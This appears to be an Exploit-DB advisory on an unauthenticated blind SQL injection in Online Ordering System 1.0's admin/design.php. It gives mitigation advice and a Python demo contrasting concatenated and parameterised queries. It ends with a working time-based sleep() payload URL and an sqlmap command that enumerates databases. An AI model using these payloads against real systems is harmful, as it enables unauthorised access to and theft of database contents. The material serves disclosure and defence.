Vendor: Online Ordering System
By: Suraj Bhosale
CVSS: 7.5 (HIGH)
Vulnerability Type: Blind SQL Injection
CWE: 89
Product Name: Online Ordering System
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
Year: 2021

Online Ordering System 1.0 – Blind SQL Injection (Unauthenticated)

Online Ordering System 1.0 is vulnerable to blind SQL injection through the 'id' GET parameter of admin/design.php. The parameter is inserted into a SQL query without sanitisation, so a value such as 9' and sleep(20) and '1'='1 closes the string literal and appends attacker-controlled SQL. The page does not echo query results, which is what makes the injection blind: the proof of concept relies on MySQL's sleep() to turn a true condition into a measurable response delay, and a tool such as sqlmap can use that side channel to enumerate databases, tables and rows, or to perform other actions permitted to the application's database account. The advisory reports the endpoint, although it lives under the admin/ directory, as reachable without authentication.

Mitigation:

Fix the root cause by passing 'id' to the database as a bound parameter of a prepared statement (PDO or mysqli in PHP) instead of concatenating it into the query string, and additionally validate that 'id' is an integer before use, since design.php only expects numeric identifiers. Two defence-in-depth measures limit the impact of any injection that slips through: require administrator authentication for everything under admin/, and run the application's database account with the minimum privileges it needs. Regular security audits and vulnerability assessments should still be carried out to find and fix similar flaws.
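The following is an added example, not code from Online Ordering System or from this Exploit-DB entry. It shows, on an in-memory SQLite table standing in for the MySQL table behind design.php, why the advisory's payload works against string-concatenated SQL and why binding the value as a parameter neutralises it. SQLite has no sleep(), so a Python stand-in is registered that only records each call and returns 0 as MySQL's sleep() does; the table name, column names and rows are constructed assumptions, since the real design.php source is not shown on the page.

```python
import sqlite3

# Added example; not code from Online Ordering System or the Exploit-DB entry.
# SQLite stands in for MySQL; table/column names (design.id, design.name) are
# assumptions because the real design.php source is not on the page.

# The payload from the advisory's step 1, exactly as it arrives in the id parameter.
PAYLOAD = "12' and sleep(20) and '1'='1"

sleep_calls = []  # every evaluation of the stand-in sleep() is recorded here


def _fake_sleep(seconds):
    """Stand-in for MySQL sleep(): record the call and return 0, as MySQL does."""
    sleep_calls.append(seconds)
    return 0


def make_db():
    """In-memory table with two constructed rows standing in for design records."""
    conn = sqlite3.connect(":memory:")
    conn.create_function("sleep", 1, _fake_sleep)
    conn.execute("CREATE TABLE design (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO design VALUES (?, ?)",
                     [(9, "classic"), (12, "modern")])
    return conn


def vulnerable_lookup(conn, design_id):
    """String concatenation (the pattern the advisory implies; assumed here):
    the quote in the payload ends the literal and the rest is parsed as SQL,
    so sleep(20) is evaluated for the matching row."""
    sql = "SELECT id, name FROM design WHERE id='" + design_id + "'"
    return conn.execute(sql).fetchall()


def safe_lookup(conn, design_id):
    """Parameterised query: the whole input is bound as one value and never
    reaches the SQL parser, so sleep() is never evaluated and no row matches."""
    sql = "SELECT id, name FROM design WHERE id=?"
    return conn.execute(sql, (design_id,)).fetchall()


def run(design_id):
    """Run both lookups on one input; report rows and how often sleep() fired."""
    conn = make_db()
    sleep_calls.clear()
    vuln_rows = vulnerable_lookup(conn, design_id)
    vuln_sleeps = len(sleep_calls)
    sleep_calls.clear()
    safe_rows = safe_lookup(conn, design_id)
    safe_sleeps = len(sleep_calls)
    return {"vulnerable_rows": vuln_rows, "vulnerable_sleeps": vuln_sleeps,
            "safe_rows": safe_rows, "safe_sleeps": safe_sleeps}


if __name__ == "__main__":
    print("benign id=12:", run("12"))
    print("payload     :", run(PAYLOAD))
```

For the benign value "12" both lookups return the same row and sleep() never runs. For the advisory's payload, the concatenated query evaluates sleep(20) (the real server would stall for 20 seconds) and returns nothing because sleep() yields 0, while the parameterised query simply looks for a design whose id is the literal text of the payload and touches sleep() not at all.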
Source: Exploit-DB raw data

# Exploit Title: Online Ordering System 1.0 - Blind SQL Injection (Unauthenticated)
# Date: 2021-03-04
# Exploit Author: Suraj Bhosale
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/5125/online-ordering-system-using-phpmysql.html
# Version: v1.0
# Vulnerable endpoint: http://localhost/onlineordering/GPST/admin/design.php?id=9
# Vulnerable Parameter: id

Steps to Reproduce:
1) Visit
http://localhost/onlineordering/GPST/admin/design.php?id=12'%20and%20sleep(20)%20and%20'1'='1 and you will see a time delay of 20 seconds in the response.
2) Now run the following command in sqlmap.

CMD: sqlmap -u "http://localhost/onlineordering/GPST/admin/design.php?id=9" --batch --dbs

3) Using the above command we will get the names of all the databases.